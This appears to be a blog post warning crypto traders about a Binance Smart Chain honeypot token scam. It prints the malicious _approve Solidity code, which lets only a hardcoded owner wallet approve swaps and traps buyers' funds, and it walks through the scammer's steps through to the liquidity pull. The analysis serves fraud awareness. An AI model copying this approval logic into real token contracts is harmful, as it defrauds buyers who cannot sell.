A guide for crypto traders and a technical analysis of a popular Binance Smart Chain smart contract scam resulting in an inability to Approve swapping on PancakeSwap.

Originaly posted as gist LINK, but migrated to a new blog.

The scam is based on a modified _approve method which allows only the owner of the token to swap SCAMTOKEN->BNB and prevents other swaps.

Example and analysis is based on

Other similar scam coins


  • First transaction is a transfer of nearly all funds from 0x0000000000000000000000000000000000000000 to the owner of the contract
  • Second transaction is add liquidity of all transfered funds and BNB to Pancake LP
  • People are swapping BNB->SCAMTOKEN, but nobody can swap back, due to no way to _approve
  • Scammer can from time to time to a swap back to make it look more legit as he is the only one who can swap SCAMTOKEN->BNB
  • Scammer pulls out his LP token

For traders

  • code in a contract with IF clause and fixed address in _approve method
  • big liquidity is added at the very beginning
  • no locked liquidity (like for most of the fresh tokens)
  • swaps back (SCAMTOKEN->BNB) are only from a fixed wallet or maybe multiple fixed wallets in future, who knows how scammers modify that scam
  • chart is nearly green all the time as people swap and fall into a trap, but to see such chart some people need to fell into the trap already ;(


STEP 1 – Create token and the contract

The scammer in step one creates a contract with malicious _approve method:


  function _approve(address owner, address spender, uint256 amount) internal {
    require(owner != address(0), "BEP20: approve from the zero address");
    require(spender != address(0), "BEP20: approve to the zero address");
    if (owner == address(0x8Dcf2B0C9A75b565e451a7F76067714cd96F03a1)) {
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    } else {
        _allowances[owner][spender] = 0;
        emit Approval(owner, spender, 0);

The if clause emits approval only when the owner of the contract is doing approving.

The following is the main part:

    if (owner == address(0x8Dcf2B0C9A75b565e451a7F76067714cd96F03a1)) {
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);

STEP 2 – Add liquidity

The scamer next adds a lot of liquidity.


According to Transaction Action.

Add 95,000 APE And 11 BNB Liquidity To PancakeSwap

STEP 3 – Waiting for victims and swaps

People are swapping, but nobody is actually swapping it back as it is not possible due to the malicious _approve function.

On a chart it can be seen that the chart is only green and constantly increasing, however as you can see in APE example, the scammer did swap back at some point, to pretend it is possible to swap back and for a moment the chart had some red candles.


Sample swap back transaction from scammer’s wallet (owner of the contract)

From 0x8dcf2b0c9a75b565e451a7f76067714cd96f03a1To PancakeSwap: APE 21 For 100 Ape (APE)
From PancakeSwap: APE 21To PancakeSwap: Router For 0.012071609240905323 ($5.05) Wrapped BNB (WBNB)

STEP 4 – Cash-out

When scammer wants to cash out, he/she simply takes out the LP token and BNB is increased, while the scam token is decreased, due to AMM and liquidity pools mechanics. People after all were only able to deposit BNB and buy SCAMToken.



In this example with APE token it was not so smooth as the token has not got a traction and the scammer has not earned a lot.

Remove 92,317.1 APE And 11.3202162031125056 BNB Liquidity FromPancakeSwap

compared to what was put into the liquidity pool

Add 95,000 APE And 11 BNB Liquidity ToPancakeSwap

So only ~0.32 BNB earned, this time. In other cases it was way more around 11 BNB.

Final thoughts

  • msg me@Twitter if you found a scam and want to know how it works or increase your chances to not fell for it again

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